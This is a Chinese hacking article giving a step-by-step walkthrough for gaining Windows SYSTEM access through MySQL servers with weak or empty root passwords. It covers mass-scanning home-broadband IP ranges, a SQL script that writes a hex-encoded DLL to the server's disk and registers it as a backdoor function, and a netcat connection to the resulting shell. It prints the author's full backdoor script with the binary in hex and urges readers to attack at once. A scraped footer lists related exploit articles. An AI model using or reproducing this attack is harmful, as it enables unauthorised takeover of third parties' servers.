由mysql弱口令取得system权限的实战_漏洞研究

由mysql弱口令取得windows的system权限的实战  

今年五月mix在幻影论坛公布了一篇关于mysql入侵的文章(<<Windows环境下通过MySQL以SYSTEM身份  

执行系统命令>>,连接地址='http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006' target=_blank>http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反应强烈.随  

后不久,黑客基地古典辣m做了个演示动画,可惜其中的用到mysql.txt并没有公布,造成很多不熟悉mysql的  

人不能实战入侵mysql.  

其实通过注册mysql 的UDF DLL中自写的Function而执行任意命令早在去年12月已经公布了,参看文章  

='http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331;' target=_blank>http://www.

ph4nt0m.org/bbs/showthread.php?s=&threadid=33331;而mix实现直接从mysql客户端传送二  

进制文件进入服务端硬盘中,不得不说是一个了不起的发现!下面我来说说我的入侵实战!  

1.打开hscan1.2扫描一段ip,我推荐大家扫描adsl所在的ip段,因为这些段ip的主人安全意思差,从而  

能扫到大量的mysql的root口令为空且有访问mysql默认数据库mysql的权限.  

2.在自己的机器上装个mysql for windows.下载地址  

='http://download.pchome.net/internet/server/dbserver/2506.html' target=_blank>http://download

.pchome.net/internet/server/dbserver/2506.html  

3.在幻影论坛下载个my_udf.dll或者mix.dll(我比较偏好my_udf.dll,因为mix.dll会造成mysql假  

死).  

4.运行winhex,打开my_udf.dll,点edit菜单下面的copy all选hex values;打开记事本,点粘贴,这样  

就把十六进制的my_udf.dll复制进去了!  

5.再打开另外个记事本写入如下语句:  

use mysql;  

set @a=concat('',0x...)  

create table Mix(data LONGBLOB);  

insert into Mix values("");update Mix set data = @a;  

select data from Mix into DUMPFILE 'c:\\my_udf.dll';  

create FUNCTION my_udfdoor RETURNS STRING SONAME 'c:\\my_udf.dll';  

select my_udfdoor('');  

6.把第四步中记事本上的十六进制数据复制出来替换掉第5步中第二行语句中的"...",并保存到c盘根  

目录下面,命名为mysql.txt.  

7.在本地打开一个dos命令窗口,跳转到mysql安装目录下面,输入mysql -h218.1.1.1 -uroot -p123  

(注意,把218.1.1.1,root,123分别替换为你的hscan扫描到的ip,username,password的值.如果password的  

值为空,则可以不需要参数-p);  

8.在第7步中连接成功远程mysql服务器的话,就输入 \. c:\mysql.txt并敲一下回车.如果远程mysql  

是运行在windows操作系统下的且你扫描到的mysql帐号权限足够高的话,就会成功在远程服务器上装上你  

的后门.  

9.最后用nc来连接此服务器的3306端口,并输入密码fuck,按回车,如果shell没有出来,就多敲几次回  

车.如果还是不出shell,那就换个目标试一试吧.  

下面我贴上我机器上的mysql.txt的内容,方便大家立即行动!不过后门密码不是fuck,我改为ping了.  

欢迎大家光顾我的小站 ='http://www.hackercradle.com/.' target=_blank>http://www.hackercradle.com

/.我的qq群2762695,9207339欢迎加入!---------  

----------------------------------------------------------------------------------  

use mysql;  

set @a=concat('',  

0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000  

000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D20  

63616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000002BBD33376FDC5D646F  

DC5D646FDC5D6414C051646EDC5D64ECC053647BDC5D6487C3576459DC5D6436FF4E6468DC5D646FDC5C6423DC5D  

6487C356646DDC5D6487C359646EDC5D64526963686FDC5D6400000000000000000000000000000000504500004C  

010400DEB188420000000000000000E0000E210B010600004000000030000000000000B915000000100000005000  

00000000100010000000100000040000000100000004000000000000000080000000100000000000000200000000  

0010000010000000001000001000000000000010000000D05A000048000000B05500005000000000000000000000  

00000000000000000000000000000000000070000094040000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000500000F00000000000000000000000000000  

000000000000000000000000002E74657874000000F4350000001000000040000000100000000000000000000000  

000000200000602E72646174610000180B0000005000000010000000500000000000000000000000000000400000  

402E64617461000000E00F0000006000000010000000600000000000000000000000000000400000C02E72656C6F  

6300002A0B0000007000000010000000700000000000000000000000000000400000420000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  

000000E8CB020000B834600010C3909090909081EC800400005355568B351450001033DB578D442428538D4C2428  

508D54241C5152C74424380C000000895C243CC744244001000000FFD68D442428538D4C241C508D5424285152FF  

D6B91100000033C08D7C243C8B1558600010F3AB8B4424208B0D54600010894424748B4424248944247C89442478  

894C24348D8424800000008D4C243C50515353538954244C6A01538D542450535253C78424900000000101000066  

899C2494000000FF15105000108B9C24940400008B2D0C5000108B5424146A008D4424146A00508D8C249C000000  

68000400005152FF15085000108B54241085D20F84C7000000B90001000033C08DBC249000000050F3AB8D442414  

8D8C249400000050528B5424205152FFD585C00F842D0100008B4424108B35E05000106A008D8C24940000005051  

53FFD685C00F8E0D0100008B54241081FA000400000F85CB000000B90001000033C08DBC249000000050F3AB8D44  

24148D8C249400000050528B5424205152FFD585C00F849D0000008B4424106A008D8C2494000000505153FFD685  

C00F8E830000006A64FF15205000108B54241081FA0004000074A46A0AFF1520500010E90CFFFFFF6A008D942494  

00000068000400005253FF150869001085C08944241C76768D4C241C6A0051508B4424248D94249C0000005250FF  

153C5000106A048D8C2494000000684C600010518BF0E85E2E000083C40C85C0741985F6743A6A64FF1520500010  

6A0AFF1520500010E99DFEFFFFBF3860001083C9FF33C06A00F2AEF7D14951683860001053FF15E050001053FF15  

E45000105F5E5D33C05B81C480040000C39090909090909090909090908B4424108B4C240C53568B74240C578B7C  

241450515756FF1508690010685C600010578BD8E8C601000083C40885C074216A046830600010680610000068FF  

FF000056FF15E850001056E851FDFFFF83C4045F8BC35E5BC2100090909090909081EC14010000535657B93F0000  

0033C08D7C2421C6442420008B1574600010F3AB8B0D706000108954241C66ABAAA16C600010894C24188A0D6860  

001089442414A164600010884C24108944240CFF15245000108D5424206800010000526A008BF8FF15385000108B  

1D1C5000108D44240C8D4C24145051FFD350FF15185000108D5424208BF052FFD35068701200108D44241C565057  

893508690010E80E00000083C4145F5E5B81C414010000C39083EC085657FF15345000108B7C2424894424088D44  

240C506A016A0157FF15005000108BF085F6750B5FB8010000005E83C408C38B460C85C07422538B5C241C558B2D  

3050001003C75350FFD585C0740A8B462083C61485C075EC5D5B8B460C85C0750B5FB8020000005E83C408C38B76  

1003F78B0685C074128B4C241C3BC174158B460483C60485C075F25FB8030000005E83C408C38B7C24148D4C2408  

516A046A045657FF152C50001085C0750B5FB8060000005E83C408C38D54240C8D442420526A04505657FF152850  

0010F7D81BC05F24FC5E83C00483C408C390908B4C24085753568A118B7C241084D274698A710184F6744F8BF78B  

4C24148A074638D0741584C0740B8A064638D0740A84C075F55E5B5F33C0C38A064638F075EB8D7EFF8A610284E4  

74288A0683C60238E075C48A410384C074188A66FF83C10238E074DFEBB133C05E5B5F8AC2E9D30100008D47FF5E  

5B5FC38BC75E5B5FC38B44240883F8010F8588000000FF15445000106A01A324690010E8E80A000085C059743CA1  

2469001033C98A0D2569001025FF000000C12D2469001010A32C690010890D30690010C1E00803C1A328690010E8  

4303000085C07509E8E30A000033C0EB72FF1540500010A3D86F0010E861090000A310690010E841040000E80507  

0000E847060000E8EF010000FF050C690010EB3E33C93BC1752C390D0C6900107EBDFF0D0C690010390D5C690010  

7505E804020000E8C0050000E82E030000E87E0A0000EB0C83F803750751E84D030000596A0158C20C00558BEC53  

8B5D08568B750C578B7D1085F67509833D0C69001000EB2683FE01740583FE027522A1DC6F001085C07409575653  

FFD085C0740C575653E8E7FEFFFF85C0750433C0EB4E575653E88F0A000083FE0189450C750C85C07537575053E8  

C3FEFFFF85F6740583FE037526575653E8B2FEFFFF85C0750321450C837D0C007411A1DC6F001085C07408575653  

FFD089450C8B450C5F5E5B5DC20C00A11869001083F801740D85C0750E833D1C690010017505E82C0A0000FF7424  

04E85C0A000068FF000000FF15806000105959C3CCCCCCCCCCCCCC8D42FF5BC38DA424000000008D64240033C08A  

442408538BD8C1E0088B542408F7C20300000074138A0A4238D974D184C97451F7C20300000075ED0BD8578BC3C1  

E310560BD88B0ABFFFFEFE7E8BC18BF733CB03F003F983F1FF83F0FF33CF33C683C20481E100010181751C250001  

018174D32500010101750881E60000008075C45E5F5B33C0C38B42FC38D8743684C074EF38DC742784E474E7C1E8  

1038D8741584C074DC38DC740684E474D4EB965E5F8D42FF5BC38D42FE5E5F5BC38D42FD5E5F5BC38D42FC5E5F5B  

C3A1D46F001085C07402FFD068106000106808600010E8EA00000068046000106800600010E8DB00000083C410C3  

6A006A01FF74240CE81300000083C40CC36A016A006A00E80400000083C40CC357E89F0000006A015F393D606900  

107511FF742408FF152450001050FF154C500010837C240C00538B5C2414893D5C690010881D58690010753CA1D0  

6F001085C074228B0DCC6F0010568D71FC3BF072138B0685C07402FFD083EE043B35D06F001073ED5E6818600010  

6814600010E84300000059596820600010681C600010E832000000595985DB5B7407E81D0000005FC3FF74240889  

3D60690010FF15485000105FC36A0DE86A0A000059C36A0DE8C20A000059C3568B7424083B74240C730D8B0685C0  

7402FFD083C604EBED5EC356E8AA090000FF155850001083F8FFA390600010743A6A746A01E89C0A00008BF05985  

F659742956FF3590600010FF155450001085C0741856E83400000059FF1550500010834E04FF6A018906585EC333  

C05EC3E880090000A19060001083F8FF740E50FF155C500010830D90600010FFC38B442404C7405010620010C740  

1401000000C3A19060001083F8FF0F8491000000568B74240885F6750D50FF15605000108BF085F6746C8B462485  

C0740750E8920A0000598B462885C0740750E8840A0000598B463085C0740750E8760A0000598B463885C0740750  

E8680A0000598B464085C0740750E85A0A0000598B464485C0740750E84C0A0000598B46503D10620010740750E8  

3B0A00005956E8340A0000596A00FF3590600010FF15545000105EC3558BEC83EC485356576880040000E8580A00  

008BF05985F675086A1BE896FCFFFF598935C06E0010C705C06F0010200000008D86800400003BF0731E80660400  

830EFF83660800C646050AA1C06E001083C6240580040000EBDE8D45B850FF157050001066837DEA000F84D10000  

008B45EC85C00F84C60000008B388D58048D043B8945FCB8000800003BF87C028BF8393DC06F00107D56BEC46E00  

106880040000E8C409000085C059743C8305C06F00102089068D88800400003BC1731C806004008308FF83600800  

C640050A8B0E83C02481C180040000EBE083C604393DC06F00107CB7EB068B3DC06F001033F685FF7E4C8B45FC8B  

0883F9FF74388A03A8017432A808750B51FF156C50001085C074238BCE8BC6C1F90583E01F8B0C8DC06E00108D04  

C08D04818B4DFC8B0989088A0B8848048345FC0446433BF77CB433DB8B0DC06E00108D04DB833C81FF8D3481754D  

85DBC646048175056AF658EB0A8BC348F7D81BC083C0F550FF15685000108BF883FFFF741757FF156C50001085C0  

740C25FF000000893E83F8027506804E0440EB0F83F803750A804E0408EB04804E04804383FB037C97FF35C06F00  

10FF15645000105F5E5BC9C3535657BEC06E00108B0685C074378BF805800400003BF873218D5F0C837BFC007407  

53FF15745000108B0683C724058004000083C3243BF872E2FF36E8260800008326005983C60481FEC06F00107CB8  

5F5E5BC35333DB391DC86F001056577505E8220E00008B351069001033FF8A063AC374123C3D74014756E8B60900  

00598D740601EBE88D04BD0400000050E81C0800008BF0593BF389354069001075086A09E854FAFFFF598B3D1069  

0010381F74395557E87C0900008BE85945803F3D742255E8E70700003BC359890675086A09E825FAFFFF5957FF36  

E8660800005983C6045903FD381F75C95DFF3510690010E87107000059891D10690010891E5F5EC705C46F001001  

0000005BC3558BEC51515333DB391DC86F001056577505E8640D0000BE6469001068040100005653FF1538500010  

A1D86F00108935506900108BFE381874028BF88D45F8508D45FC50535357E84D0000008B45F88B4DFC8D048850E8  

470700008BF083C4183BF375086A08E883F9FFFF598D45F8508D45FC508B45FC8D0486505657E8170000008B45FC  

83C414488935386900105F5EA3346900105BC9C3558BEC8B4D188B451453568321008B7510578B7D0CC700010000  

008B450885FF7408893783C704897D0C80382275448A50014080FA22742984D274250FB6D2F682A16D001004740C  

FF0185F674068A1088164640FF0185F674D58A10881646EBCEFF0185F6740480260046803822754640EB43FF0185  

F674058A108816468A10400FB6DAF683A16D001004740CFF0185F674058A18881E464080FA20740984D2740980FA  

0975CC84D2750348EB0885F674048066FF00836518008038000F84E00000008A1080FA20740580FA09750340EBF1  

8038000F84C800000085FF7408893783C704897D0C8B5514FF02C745080100000033DB80385C75044043EBF78038  

22752CF6C301752533FF397D18740D807801228D500175048BC2EB03897D088B7D0C33D23955180F94C2895518D1  

EB8BD34B85D2740E4385F67404C6065C46FF014B75F38A1084D2744A837D1800750A80FA20743F80FA09743A837D  

0800742E85F674190FB6DAF683A16D001004740688164640FF018A10881646EB0F0FB6D2F682A16D001004740340  

FF01FF0140E958FFFFFF85F6740480260046FF01E917FFFFFF85FF74038327008B45145F5E5BFF005DC35151A168  

6A001053558B2D88500010565733DB33F633FF3BC37533FFD58BF03BF3740CC705686A001001000000EB28FF1584  

5000108BF83BFB0F84EA000000C705686A001002000000E98F00000083F8010F85810000003BF3750CFFD58BF03B  

F30F84C200000066391E8BC6740E404066391875F9404066391875F22BC68B3D80500010D1F85353405353505653  

5389442434FFD78BE83BEB743255E8B40400003BC35989442410742353535550FF742424565353FFD785C0750EFF  

742410E84904000059895C24108B5C241056FF157C5000108BC3EB5383F802754C3BFB750CFF15845000108BF83B  

FB743C381F8BC7740A40381875FB40381875F62BC7408BE855E84D0400008BF0593BF3750433F6EB0B555756E830  

0A000083C40C57FF15785000108BC6EB0233C05F5E5D5B5959C333C06A003944240868001000000F94C050FF1590  

50001085C0A3A86E00107415E8290D000085C0750FFF35A86E0010FF158C50001033C0C36A0158C35333DB391D70  

6C0010558B2D985000107E44A1746C001056578B3D945000108D700C68004000006800001000FF36FFD768008000  

006A00FF36FFD7FF76046A00FF35A86E0010FFD583C614433B1D706C00107CCE5F5EFF35746C00106A00FF35A86E  

0010FFD5FF35A86E0010FF158C5000105D5BC36A0158C20C00A11869001083F801740D85C0752A833D1C69001001  

752168FC000000E818000000A16C6A00105985C07402FFD068FF000000E80200000059C3558BEC81ECA40100008B  

550833C9B8C06000103B10740B83C008413D506100107CF1568BF1C1E6033B96C06000100F851C010000A1186900  

1083F8010F84E800000085C0750D833D1C690010010F84D700000081FAFC0000000F84F10000008D855CFEFFFF68  

04010000506A00FF153850001085C075138D855CFEFFFF68C853001050E84103000059598D855CFEFFFF57508DBD  

5CFEFFFFE81C040000405983F83C76298D855CFEFFFF50E8090400008BF88D855CFEFFFF83E83B6A0303F868C453  

001057E86F14000083C4108D8560FFFFFF68A853001050E8EB0200008D8560FFFFFF5750E8EE0200008D8560FFFF  

FF68A453001050E8DD020000FFB6C46000108D8560FFFFFF50E8CB02000068102001008D8560FFFFFF687C530010  

50E88313000083C42C5FEB268D45088DB6C46000106A0050FF36E87C0300005950FF366AF4FF156850001050FF15  

3C5000105EC9C3568B359C500010FF3594610010FFD6FF3584610010FFD6FF3574610010FFD6FF3554610010FFD6  

5EC356578B3D74500010BE506100108B0685C0742B81FE94610010742381FE84610010741B81FE74610010741381  

FE54610010740B50FFD7FF36E8320100005983C60481FE106200107CC4FF3574610010FFD7FF3584610010FFD7FF  

3594610010FFD7FF3554610010FFD75F5EC3558BEC8B450856833C8550610010008D348550610010753E576A18E8  

2B0100008BF85985FF75086A11E869F3FFFF596A11E8CAFFFFFF833E005957750AFF159C500010893EEB06E8B700  

0000596A11E80D000000595FFF36FF15A05000105E5DC3558BEC8B4508FF348550610010FF15A45000105DC35356  

8B74240C570FAF74241483FEE08BDE770D85F675036A015E83C60F83E6F033FF83FEE0773A3B1DA0630010771D6A  

09E854FFFFFF53E8580D00006A098BF8E8A6FFFFFF83C40C85FF752B566A08FF35A86E0010FF15A85000108BF885  

FF7522833DE46A001000741956E8C313000085C0597414EBA9536A0057E85B13000083C40C8BC75F5E5BC333C0EB  

F8568B74240885F6743D6A09E8EDFEFFFF56E89B0900005985C05974135650E8B90900006A09E834FFFFFF83C40C  

5EC36A09E828FFFFFF59566A00FF35A86E0010FF15985000105EC3FF35E46A0010FF742408E8030000005959C383  

7C2404E07722FF742404E81C00000085C0597516394424087410FF742404E82813000085C05975DE33C0C3568B74  

24083B35A06300105777216A09E862FEFFFF56E8660C00006A098BF8E8B4FEFFFF83C40C85FF74048BC7EB1C85F6  

75036A015E83C60F83E6F0566A00FF35A86E0010FF15A85000105F5EC3CCCCCCCCCCCCCCCCCCCC578B7C2408EB6A  

8DA424000000008BFF8B4C240457F7C103000000740F8A014184C0743BF7C10300000075F18B01BAFFFEFE7E03D0  

83F0FF33C283C104A90001018174E88B41FC84C0742384E4741AA90000FF00740EA9000000FF7402EBCD8D79FFEB  

0D8D79FEEB088D79FDEB038D79FC8B4C240CF7C10300000074198A114184D27464881747F7C10300000075EEEB05  

891783C704BAFFFEFE7E8B0103D083F0FF33C28B1183C104A90001018174E184D2743484F67427F7C20000FF0074  

12F7C2000000FF7402EBC789178B4424085FC36689178B442408C64702005FC36689178B4424085FC388178B4424  

085FC38B4C2404F7C10300000074148A014184C07440F7C10300000075F105000000008B01BAFFFEFE7E03D083F0  

时间: 2024-10-31 01:58:51

由mysql弱口令取得system权限的实战_漏洞研究的相关文章

webshell权限提升技巧_漏洞研究

WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

关于mysql 3.0的注射的一点思路_漏洞研究

mysql 3.0的注射   对mysql的注射主要是靠union 的联合查询,但union只对版本4.0以上的有用,对3.0以下的就没用了..........   所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file   但是也不可以直接使用union替换出来. 下面就是我的一点思路:   得到版本:   mysql> select * from user where userid=1 and length(version())<10;   Emp

WEBSHELL提升权限又一招_漏洞研究

      Serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等.但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权.WEB

UPDATE注射(mysql+php)的两个模式_漏洞研究

UPDATE注射(mysql+php)的两个模式                               文/安全天使·SuperHei 2005.8.11  一.测试环境:  OS: Windowsxp sp2  php: php 4.3.10 (  mysql 4.1.9  apache 1.3.33   二.测试数据库结构:  -----start---  -- 数据库: `test`  --   -- -----------------------------------------

phpwind管理权限泄露漏洞利用程序发布_漏洞研究

漏洞发布:http://www.80sec.com/  漏洞作者:jianxin@80sec.com  漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本  漏洞危害:高  漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作  利用方式:http://www.80sec.com有提供exploit  漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导

用漏洞提升计算机控制权限(图)_漏洞研究

据称Windows COM结构存在安全问题,本地或远程攻击者可以利用这个漏洞提升特权或执行任意指令.受影响的操作系统和程序在处理COM结构化存储文件时,在访问共享内存的方式中存在权限提升漏洞,一个已登录的用户可利用此漏洞完全控制系统.  安全公告牌  这是一个权限提升漏洞. 成功利用此漏洞的攻击者可以完全控制受影响的系统. 攻击者可随后安装程序;查看.更改或删除数据;或者创建拥有完全用户权限的新账户. 要利用此漏洞,攻击者必须能够本地登录到系统并运行程序.  受影响的系统包括:Windows 2

浅谈SQL SERVER数据库口令的脆弱性_漏洞研究

跟踪了一下SQL SERVER数据库服务器的登录过程发现口令计算是非常脆弱的SQL SERVER数据库的口令脆弱体现两方面 1.网络登陆时候的口令加密算法 2.数据库存储的口令加密算法. 下面就分别讲述 1.网络登陆时候的口令加密算法 SQL SERVER网络加密的口令一直都非常脆弱网上有很多写出来的对照表但是都没有具体的算法处理实际上跟踪一下SQL SERVER的登陆过程,就很容易获取其解密的算法好吧我们还是演示一下汇编流程 登录类型的TDS包跳转到4126a4处执行     004DE72E

动网7.x权限提升漏洞原理_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件存在注入漏洞但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的ccess和 SQL版都有效.下面我们就以7.0 SP2 SQL版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录验证

Serv-U本地权限提升的ASP版实现_漏洞研究

网上流传可以利用MSWinsock控件实现,这是不好滴.因为这是个第三方组件,呵呵,几率相当小,既然要杀人灭口,嘿嘿,肯定要采用一套通杀的方法才是. Serv-U服务器管理那里使用了FTP协议,所以我们应该研究一下FTP协议先. 正常的FTP协议的认证过程:  220 Serv-U FTP Server v5.2 for WinSock ready... user lake2 331 User name okay, need password. pass lake2lake2 230 User